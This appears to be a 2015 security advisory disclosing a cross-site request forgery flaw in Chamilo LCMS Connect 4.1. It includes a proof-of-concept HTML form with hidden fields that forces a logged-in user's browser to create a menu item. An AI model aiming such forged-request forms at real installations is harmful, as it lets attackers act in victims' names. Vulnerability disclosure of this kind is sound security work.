Chamilo LCMS Connect version 4.1 suffers from a cross site request forgery vulnerability.
e6d33c2ac3475671dccc1719ebe3a8c61a272de4e15c67ec8ec0476599601b4f
Hi Team,
#Affected Vendor: http://lcms.chamilo.org/
#Date: 27/03/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: XSRF
#Tested on: Windows 7
#Product: LCMS Connect
#Version: 4.1
#Description: Chamilo is an open-source (under GNU/GPL licensing)
e-learning and content management system, aimed at improving access to
education and knowledge globally. Chamilo LCMS is a completely new software
platform for e-learning and collaboration. The application is vulnerable to
XSRF attacks. If an attacker is able to lure a user into clicking a crafted
link or by embedding such a link within web pages he could control the
user's actions.
#Proof of Concept (PoC):
------------------------------------
<form method="POST" name="form1" action="
http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem
">
<input type="hidden" name="parent" value="0"/>
<input type="hidden" name="title[de]" value=""/>
<input type="hidden" name="title[en]" value="tester"/>
<input type="hidden" name="title[fr]" value=""/>
<input type="hidden" name="title[nl]" value=""/>
<input type="hidden" name="application" value="weblcms"/>
<input type="hidden" name="submit_button" value="Create"/>
<input type="hidden" name="_qf__item" value=""/>
<input type="hidden" name="type" value="core\menu\ApplicationItem"/>
</form>
--
Regards,
*Joel V*